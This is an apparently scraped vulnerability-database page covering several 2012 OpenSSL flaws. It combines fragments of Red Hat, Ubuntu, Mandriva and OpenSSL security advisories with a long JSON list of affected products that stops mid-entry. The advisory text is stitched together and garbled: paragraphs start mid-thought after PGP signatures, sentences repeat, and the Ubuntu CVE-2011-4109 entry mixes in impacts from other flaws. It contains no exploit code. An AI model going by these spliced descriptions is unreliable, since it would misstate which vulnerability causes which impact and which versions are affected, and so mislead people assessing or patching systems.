Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-4108.html https://www.redhat.com/security/data/cve/CVE-2011-4576.html https://www.redhat.com/security/data/cve/CVE-2011-4577.html https://www.redhat.com/security/data/cve/CVE-2011-4619.html https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3 CJl5iUxU4cxJLOsSBESSRVs= =PMiS -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-1357-1 February 09, 2012
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Multiple vulnerabilities exist in OpenSSL that could expose sensitive information or cause applications to crash.
Software Description: - openssl: Secure Socket Layer (SSL) binary and related cryptographic tools
Details:
It was discovered that the elliptic curve cryptography (ECC) subsystem in OpenSSL, when using the Elliptic Curve Digital Signature Algorithm (ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement curves over binary fields. This could allow an attacker to determine private keys via a timing attack. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)
Adam Langley discovered that the ephemeral Elliptic Curve Diffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread safety while processing handshake messages from clients. This could allow a remote attacker to cause a denial of service via out-of-order messages that violate the TLS protocol. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. This could allow a remote attacker to recover plaintext. This could allow a remote attacker to cause a denial of service. This could allow a remote attacker to cause a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-4109)
It was discovered that OpenSSL, in certain circumstances involving ECDH or ECDHE cipher suites, used an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves. This issue only affected Ubuntu 8.04 LTS. (CVE-2011-4576)
Andrew Chi discovered that OpenSSL, when RFC 3779 support is enabled, could trigger an assert when handling an X.509 certificate containing certificate-extension data associated with IP address blocks or Autonomous System (AS) identifiers. This could allow a remote attacker to cause a denial of service. This could allow a remote attacker to cause a denial of service. (CVE-2011-4619)
Andrey Kulikov discovered that the GOST block cipher engine in OpenSSL did not properly handle invalid parameters. This could allow a remote attacker to cause a denial of service via crafted data from a TLS client. This issue only affected Ubuntu 11.10. (CVE-2012-0027)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 11.10: libssl1.0.0 1.0.0e-2ubuntu4.2 openssl 1.0.0e-2ubuntu4.2
Ubuntu 11.04: libssl0.9.8 0.9.8o-5ubuntu1.2 openssl 0.9.8o-5ubuntu1.2
Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.6 openssl 0.9.8o-1ubuntu4.6
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.8 openssl 0.9.8k-7ubuntu8.8
Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.15 openssl 0.9.8g-4ubuntu3.15
After a standard system update you need to reboot your computer to make all the necessary changes. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFPFFiBmqjQ0CJFipgRAkIUAJ9foScZELNgGkHUEaaSx9sgdWNMFwCgnsst eph27yO3eEECVX28+SNUKyw= =wTFq -----END PGP SIGNATURE----- . Their attack exploits timing differences arising during decryption processing. A research paper describing this attack can be found at http://www.isg.rhul.ac.uk/~kp/dtls.pdf
Thanks go to Nadhem Alfardan and Kenny Paterson of the Information Security Group at Royal Holloway, University of London (www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann seggelmann@fh-muenster.de and Michael Tuexen tuexen@fh-muenster.de for preparing the fix.
Double-free in Policy Checks (CVE-2011-4109)
If X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8, then a policy check failure can lead to a double-free. The bug does not occur unless this flag is set. Users of OpenSSL 1.0.0 are not affected.
This flaw was discovered by Ben Laurie and a fix provided by Emilia Kasper ekasper@google.com of Google. This affects both clients and servers that accept SSL 3.0 handshakes: those that call SSL_CTX_new with SSLv3_{server|client}method or SSLv23{server|client}_method. It does not affect TLS. This could include sensitive contents of previously freed memory.
However, in practice, most deployments do not use SSL_MODE_RELEASE_BUFFERS and therefore have a single write buffer per connection. That write buffer is partially filled with non-sensitive, handshake data at the beginning of the connection and, thereafter, only records which are longer any any previously sent record leak any non-encrypted data. This, combined with the small number of bytes leaked per record, serves to limit to severity of this issue.
Thanks to Adam Langley agl@chromium.org for identifying and fixing this issue.
Malformed RFC 3779 Data Can Cause Assertion Failures (CVE-2011-4577)
RFC 3779 data can be included in certificates, and if it is malformed, may trigger an assertion failure. This could be used in a denial-of-service attack.
Note, however, that in the standard release of OpenSSL, RFC 3779 support is disabled by default, and in this case OpenSSL is not vulnerable. Builds of OpenSSL are vulnerable if configured with "enable-rfc3779".
Thanks to Andrew Chi, BBN Technologies, for discovering the flaw, and Rob Austein sra@hactrn.net for fixing it.
Thanks to George Kadianakis desnacked@gmail.com for identifying this issue and to Adam Langley agl@chromium.org for fixing it.
Invalid GOST parameters DoS Attack (CVE-2012-0027)
A malicious TLS client can send an invalid set of GOST parameters which will cause the server to crash due to lack of error checking. This could be used in a denial-of-service attack.
Only users of the OpenSSL GOST ENGINE are affected by this bug.
Thanks to Andrey Kulikov amdeich@gmail.com for identifying and fixing this issue.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20120104.txt
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0169", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.4" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7f" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6f" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6b" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efi", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "hardware management console 7r7.7.0", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "aura system manager", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "hardware management console 7r7.2.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "hardware management console 7r7.1.0 sp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "proactive contact", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "voice portal", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "aura communication manager sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.0.52" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "hardware management console 7r7.1.0 sp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "tivoli network manager fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "pfsense", "scope": "ne", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "arx", "scope": "eq", "trust": 